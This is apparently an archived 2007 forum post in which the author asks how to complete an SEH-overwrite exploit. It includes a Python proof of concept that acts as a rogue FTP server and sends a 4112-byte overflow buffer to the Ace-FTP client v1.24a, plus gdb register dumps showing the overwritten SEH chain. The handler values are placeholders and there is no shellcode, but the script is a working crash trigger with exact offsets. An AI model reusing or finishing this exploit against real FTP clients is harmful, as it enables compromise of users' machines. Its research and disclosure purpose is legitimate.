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HistoryJun 12, 2007 - 12:00 a.m.

Seh over write


Hey i was wondering if any one would be able to help i have a few question's.About over writing the seh handler's.I have wrote a poc code for an buffer over flow…The problem was i didn't over write the eip but did write to a few registers also there is a few that hold the buffer…My question is.I write to the NEXT_SEH_RECORD so i do a 06 byte jmp.Why ??Do we do a 6 byte jmp.If we do a 6 byte jump doesn't that me when we do pop popret that the pop popwont be excecuted.And lands on the ret.Little confused about that.Also i was wondering haw i would know which 2 registers to pop of the stack.Any help would be great i will provide a poc for what I'm talking about…

My original advisory can be found here.

#Credit to n00b for finding the bug.
#Ace-Ftp client buffer over flow p0c.
#This is possible to exploit as we
#Smash the seh handlers and there are
#Plenty of registers that had our buffer
#Im still new to seh over writes I haven't
#Had much experience with the seh over write
#But get the Idea from what I've read about
#It…Any way this script creates a listening
#Socket and act's as a ftp server then when the
#Client connect's a huge buffer is sent back to
#The client.Resulting and a buffer overflow.
#If any one feel's like investigating or writing
#A poc for this please do so give some credits to
#n00b.I will give it a try during the week.
#Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre
#Tested:Win xp sp2.
#Version Affected: v1.24a.

\\Debug info//

#Program received signal SIGSEGV,Segmentation fault.
#[Switching to thread 1312.0x714]
#0x00403c58 in ?? ()

#(gdb) i r

#eax 0x41414141 1094795585 <----Eax over written…
#ecx 0x0 0
#edx 0xa5b464 10859620
#ebx 0x41414141 1094795585 <----Ebx over written…
#esp 0x12e458 0x12e458
#ebp 0x12f48c 0x12f48c
#esi 0x12e488 1238152
#edi 0xa5b464 10859620
#eip 0x403c58 0x403c58
#eflags 0x10206 66054
#cs 0x1b 27
#ss 0x23 35
#ds 0x23 35
#es 0x23 35
#fs 0x3b 59
#gs 0x0 0
#fctrl 0xffff1272 -60814
#fstat 0xffff0000 -65536
#ftag 0xffffffff -1
#fiseg 0x0 0
#fioff 0x0 0
#foseg 0xffff0000 -65536
#fooff 0x0 0
#What the register look like after crash…
#EAX 41414141
#ECX 00000000
#EBX 41414141
#ESP 0012E458
#EIP 00403C58
#SEH chain of main thread
#Address SE handler
#0012E46C AceXFTP.00430B9E
#0012F498 44444444 Pointer to next SEH record
#0012F49C 45454545 SE handler

#4112byte's to over write Pointer to next SEH record
#next 4 bytes over writes se handler.

from socket import *
from struct import pack

host = " "
port = 21

Size_of_buf1 = 4112
Size_of_buf2 = 550

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
print "\nPort %d open Waiting !!! …" % port

cl, addr = s.accept()
print "Vic is connected %s" % addr[0]

buf1 = "A" * Size_of_buf1

NEXT_SEH_RECORD = "\x44\x44\x44\x44"

SE_HANDLER = "\x45\x45\x45\x45"

buf2 = "C" * Size_of_buf2

End = "\r\n"

cl.send(buf1 + NEXT_SEH_RECORD + SE_HANDLER + buf2 + End)
print "mission accomplished : OK\n"
